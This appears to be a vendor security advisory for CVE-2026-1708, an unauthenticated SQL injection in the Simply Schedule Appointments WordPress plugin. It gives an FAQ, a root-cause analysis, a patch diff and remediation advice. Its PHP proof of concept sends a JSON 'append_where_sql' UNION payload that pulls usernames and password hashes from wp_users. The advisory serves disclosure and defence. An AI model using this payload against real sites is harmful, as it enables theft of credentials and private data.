What is CVE-2026-1708?

CVE-2026-1708 is a high-severity vulnerability in the Simply Schedule Appointments plugin for WordPress, allowing unauthenticated SQL injection via the ‘append_where_sql’ parameter. This occurs due to improper validation of JSON request bodies, enabling attackers to manipulate database queries.

Who is affected by this vulnerability?

Any WordPress site using the Simply Schedule Appointments plugin version 1.6.9.27 or earlier is affected. Site administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Simply Schedule Appointments plugin and verify that the version is 1.6.9.27 or earlier.

What steps should I take to fix this vulnerability?

To mitigate this vulnerability, update the Simply Schedule Appointments plugin to version 1.6.9.29 or later. This version includes a patch that properly validates the ‘append_where_sql’ parameter to prevent SQL injection.

What does a CVSS score of 7.5 mean?

A CVSS score of 7.5 indicates a high severity vulnerability. This means that successful exploitation could lead to significant data exposure and compromise of sensitive information within the database.

What is SQL injection and how does it relate to this vulnerability?

SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. In this case, the vulnerability allows attackers to append arbitrary SQL commands to queries, potentially exposing sensitive data.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can craft a JSON payload containing SQL injection commands and send it to the vulnerable AJAX endpoint. By including a valid public token, the attacker can exploit the vulnerability to extract sensitive information from the database.

What is the role of the public_token in this vulnerability?

The public_token is a parameter that must be obtained during the booking flow of the plugin. It is necessary for an attacker to include this token in their crafted requests to successfully exploit the SQL injection vulnerability.

What are the potential consequences of exploitation?

If exploited, attackers could gain unauthorized access to sensitive information stored in the WordPress database, including user credentials, appointment details, and other confidential data, posing a significant security risk.

How can I further protect my WordPress site from vulnerabilities?

To enhance security, regularly update all plugins and themes, use strong passwords, implement web application firewalls, and conduct regular security audits. Additionally, consider using security plugins that offer vulnerability scanning.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Simply Schedule Appointments plugin until you can apply the patch. Additionally, monitor your site for any suspicious activity and restrict access to sensitive areas.

Where can I find more information about this vulnerability?

For more details, you can refer to the official CVE database, the plugin’s changelog, or security advisories from trusted security organizations that provide insights into this and other vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1708: Appointment Booking Calendar <= 1.6.9.27 – Unauthenticated SQL Injection via 'append_where_sql' Parameter (simply-schedule-appointments)

CVE ID CVE-2026-1708

Plugin simply-schedule-appointments

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.6.9.27

Patched Version 1.6.9.29

Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1708:

The vulnerability is an unauthenticated blind SQL injection in the Appointment Booking Calendar plugin (Simply Schedule Appointments) versions <= 1.6.9.27. The root cause lies in the `db_where_conditions` method within the `TD_DB_Model` class (file: includes/lib/td-util/class-td-db-model.php). This method improperly validates the `append_where_sql` parameter. The original code only checked for the parameter's presence in the `$_REQUEST` superglobal, but failed to inspect JSON request bodies. Attackers could bypass this check by sending the `append_where_sql` parameter within a JSON payload, causing the plugin to append arbitrary SQL commands to database queries.

Exploitation requires two conditions. First, attackers must obtain a valid `public_token` exposed during the booking flow. Second, they must send crafted JSON requests to WordPress AJAX endpoints that utilize the vulnerable `TD_DB_Model` class, such as appointment query endpoints. The payload would include `append_where_sql` with SQL injection commands within the JSON body, not as standard POST parameters.

The patch modifies the `db_where_conditions` method to comprehensively check all request sources. It reads raw input via `file_get_contents('php://input')`, decodes JSON payloads, and checks for `append_where_sql` in `$_REQUEST`, `$_FILES`, and the decoded JSON array. The parameter is only processed if not found in any request source, effectively blocking injection via JSON. The patch also updates the plugin version to 1.6.9.29 across multiple files.

Successful exploitation allows unauthenticated attackers to extract sensitive information from the WordPress database, including user credentials, appointment details, and other plugin data. The CVSS score of 7.5 reflects the high impact combined with the requirement for a valid public token.

Differential between vulnerable and patched code

Code Diff

--- a/simply-schedule-appointments/includes/class-appointment-model.php
+++ b/simply-schedule-appointments/includes/class-appointment-model.php
@@ -1361,6 +1361,11 @@
 		}

 		$data = $this->query( $params );
+
+		// If complete_group is set, fetch additional appointments to complete any partial groups
+		if ( ! empty( $params['complete_group'] ) ) {
+			$data = $this->complete_group_appointments( $data );
+		}

 		foreach( $data as $index => $appointment ) {
 			$data[$index] = $this->format_multiline_customer_information($appointment);
@@ -1974,4 +1979,56 @@
 		$appointment_object = new SSA_Appointment_Object( $id );
 		return $appointment_object->get_label_id();
 	}
+
+	/**
+	 * Complete group appointments by fetching any missing appointments from partial groups.
+	 *
+	 * When appointments are fetched with pagination, group appointments may be split across pages.
+	 * This method ensures all appointments belonging to the same group are returned together.
+	 *
+	 * @since 6.7.0
+	 *
+	 * @param array $data The initially fetched appointments.
+	 * @return array The appointments with any missing group members added.
+	 */
+	public function complete_group_appointments( $data ) {
+		if ( empty( $data ) ) {
+			return $data;
+		}
+
+		// Collect all group_ids and track which appointment IDs we already have
+		$group_ids          = array();
+		$existing_appt_ids  = array();
+
+		foreach ( $data as $appointment ) {
+			if ( ! empty( $appointment['group_id'] ) && $appointment['group_id'] > 0 ) {
+				$group_ids[] = $appointment['group_id'];
+			}
+			$existing_appt_ids[] = $appointment['id'];
+		}
+
+		$group_ids = array_unique( $group_ids );
+
+		// No groups found, return original data
+		if ( empty( $group_ids ) ) {
+			return $data;
+		}
+
+		// Query for appointments in each group that we don't already have
+		foreach ( $group_ids as $group_id ) {
+			$group_appointments = $this->query( array(
+				'group_id' => $group_id,
+				'number'   => -1,
+			) );
+
+			foreach ( $group_appointments as $appointment ) {
+				if ( ! in_array( $appointment['id'], $existing_appt_ids, true ) ) {
+					$data[]              = $appointment;
+					$existing_appt_ids[] = $appointment['id'];
+				}
+			}
+		}
+
+		return $data;
+	}
 }
--- a/simply-schedule-appointments/includes/class-elementor.php
+++ b/simply-schedule-appointments/includes/class-elementor.php
@@ -20,7 +20,7 @@
 	 *
 	 * @var string The plugin version.
 	 */
-	const VERSION = '1.6.9.27';
+	const VERSION = '1.6.9.29';

 	/**
 	 * Minimum Elementor Version
@@ -29,7 +29,7 @@
 	 *
 	 * @var string Minimum Elementor version required to run the plugin.
 	 */
-	const MINIMUM_ELEMENTOR_VERSION = '1.6.9.27';
+	const MINIMUM_ELEMENTOR_VERSION = '1.6.9.29';

 	/**
 	 * Minimum PHP Version
@@ -38,7 +38,7 @@
 	 *
 	 * @var string Minimum PHP version required to run the plugin.
 	 */
-	const MINIMUM_PHP_VERSION = '1.6.9.27';
+	const MINIMUM_PHP_VERSION = '1.6.9.29';

 	/**
 	 * Instance
--- a/simply-schedule-appointments/includes/class-paypal-ipn-listener.php
+++ b/simply-schedule-appointments/includes/class-paypal-ipn-listener.php
@@ -23,7 +23,7 @@
 	 *  @package    PHP-PayPal-IPN
 	 *  @author     Micah Carrick
 	 *  @copyright  (c) 2011 - Micah Carrick
-	 *  @version    1.6.9.27
+	 *  @version    1.6.9.29
 	 *  @license    http://opensource.org/licenses/gpl-3.0.html
 	 */

--- a/simply-schedule-appointments/includes/lib/td-util/class-td-db-model.php
+++ b/simply-schedule-appointments/includes/lib/td-util/class-td-db-model.php
@@ -1016,13 +1016,26 @@
 		$schema = $this->get_schema();

 		// we allow append_where_sql to be set in the backend, but not in the request parameters
-		if ( ! empty( $args['append_where_sql'] ) && empty( $_REQUEST['append_where_sql']) ) {
-			if( ! is_array( $args['append_where_sql'] ) ) {
-				$args['append_where_sql'] = array( $args['append_where_sql'] );
-			}
-
-			foreach ($args['append_where_sql'] as $where_sql) {
-				$where .= $where_sql;
+		if ( ! empty( $args['append_where_sql'] ) ) {
+			// confirm not coming from request params or body
+			// also check file_get_contents('php://input');
+			$input_raw = file_get_contents('php://input');
+			$input_json = json_decode($input_raw, true) ?? [];
+			$found_in_payload = (
+				isset($_REQUEST['append_where_sql']) ||
+				isset($_FILES['append_where_sql']) ||
+				isset($input_json['append_where_sql'])
+			);
+
+			// only append the where sql if it's not coming from the request params or body, to prevent potential sql injection
+			if( ! $found_in_payload ) {
+				if( ! is_array( $args['append_where_sql'] ) ) {
+					$args['append_where_sql'] = array( $args['append_where_sql'] );
+				}
+
+				foreach ($args['append_where_sql'] as $where_sql) {
+					$where .= $where_sql;
+				}
 			}
 		}

--- a/simply-schedule-appointments/simply-schedule-appointments.php
+++ b/simply-schedule-appointments/simply-schedule-appointments.php
@@ -3,7 +3,7 @@
  * Plugin Name: Simply Schedule Appointments
  * Plugin URI:  https://simplyscheduleappointments.com
  * Description: Easy appointment scheduling
- * Version:     1.6.9.27
+ * Version:     1.6.9.29
  * Requires PHP: 7.4
  * Author:      NSquared
  * Author URI:  https://nsquared.io/
@@ -15,7 +15,7 @@
  * @link    https://simplyscheduleappointments.com
  *
  * @package Simply_Schedule_Appointments
- * @version 1.6.9.27
+ * @version 1.6.9.29
  *
  * Built using generator-plugin-wp (https://github.com/WebDevStudios/generator-plugin-wp)
  */
@@ -206,7 +206,7 @@
 	 * @var    string
 	 * @since  0.0.0
 	 */
-	const VERSION = '1.6.9.27';
+	const VERSION = '1.6.9.29';

 	/**
 	 * URL of plugin directory.
--- a/simply-schedule-appointments/vendor/composer/installed.php
+++ b/simply-schedule-appointments/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => '__root__',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => '1dcdb3510a8f954244278878a613ea5dcaf6ea72',
+        'reference' => '03b73d1b9dd38e343b43649f9def24151b7a447b',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         '__root__' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => '1dcdb3510a8f954244278878a613ea5dcaf6ea72',
+            'reference' => '03b73d1b9dd38e343b43649f9def24151b7a447b',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1708 - Appointment Booking Calendar <= 1.6.9.27 - Unauthenticated SQL Injection via 'append_where_sql' Parameter
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
// A valid public_token obtained from the booking flow is required
$public_token = 'VALID_PUBLIC_TOKEN_HERE';

// Craft JSON payload with SQL injection in append_where_sql
$json_payload = json_encode([
    'action' => 'ssa_appointments_index', // Example AJAX action using the vulnerable model
    'public_token' => $public_token,
    'append_where_sql' => " UNION SELECT 1,2,3,user_login,user_pass,6,7,8 FROM wp_users -- ",
]);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $json_payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Content-Length: ' . strlen($json_payload)
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Code: $http_coden";
echo "Response: $responsen";

// Note: This is a blind SQL injection, so responses may require time-based or boolean inference
?>

Frequently Asked Questions

What is CVE-2026-1708?
Understanding the vulnerability
CVE-2026-1708 is a high-severity vulnerability in the Simply Schedule Appointments plugin for WordPress, allowing unauthenticated SQL injection via the ‘append_where_sql’ parameter. This occurs due to improper validation of JSON request bodies, enabling attackers to manipulate database queries.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Simply Schedule Appointments plugin version 1.6.9.27 or earlier is affected. Site administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin dashboard. Look for the Simply Schedule Appointments plugin and verify that the version is 1.6.9.27 or earlier.
What steps should I take to fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Simply Schedule Appointments plugin to version 1.6.9.29 or later. This version includes a patch that properly validates the ‘append_where_sql’ parameter to prevent SQL injection.
What does a CVSS score of 7.5 mean?
Understanding risk levels
A CVSS score of 7.5 indicates a high severity vulnerability. This means that successful exploitation could lead to significant data exposure and compromise of sensitive information within the database.
What is SQL injection and how does it relate to this vulnerability?
Explaining SQL injection
SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. In this case, the vulnerability allows attackers to append arbitrary SQL commands to queries, potentially exposing sensitive data.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept shows how an attacker can craft a JSON payload containing SQL injection commands and send it to the vulnerable AJAX endpoint. By including a valid public token, the attacker can exploit the vulnerability to extract sensitive information from the database.
What is the role of the public_token in this vulnerability?
Explaining the requirement for exploitation
The public_token is a parameter that must be obtained during the booking flow of the plugin. It is necessary for an attacker to include this token in their crafted requests to successfully exploit the SQL injection vulnerability.
What are the potential consequences of exploitation?
Impact of the vulnerability
If exploited, attackers could gain unauthorized access to sensitive information stored in the WordPress database, including user credentials, appointment details, and other confidential data, posing a significant security risk.
How can I further protect my WordPress site from vulnerabilities?
Best practices for security
To enhance security, regularly update all plugins and themes, use strong passwords, implement web application firewalls, and conduct regular security audits. Additionally, consider using security plugins that offer vulnerability scanning.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Simply Schedule Appointments plugin until you can apply the patch. Additionally, monitor your site for any suspicious activity and restrict access to sensitive areas.
Where can I find more information about this vulnerability?
Resources for further reading
For more details, you can refer to the official CVE database, the plugin’s changelog, or security advisories from trusted security organizations that provide insights into this and other vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations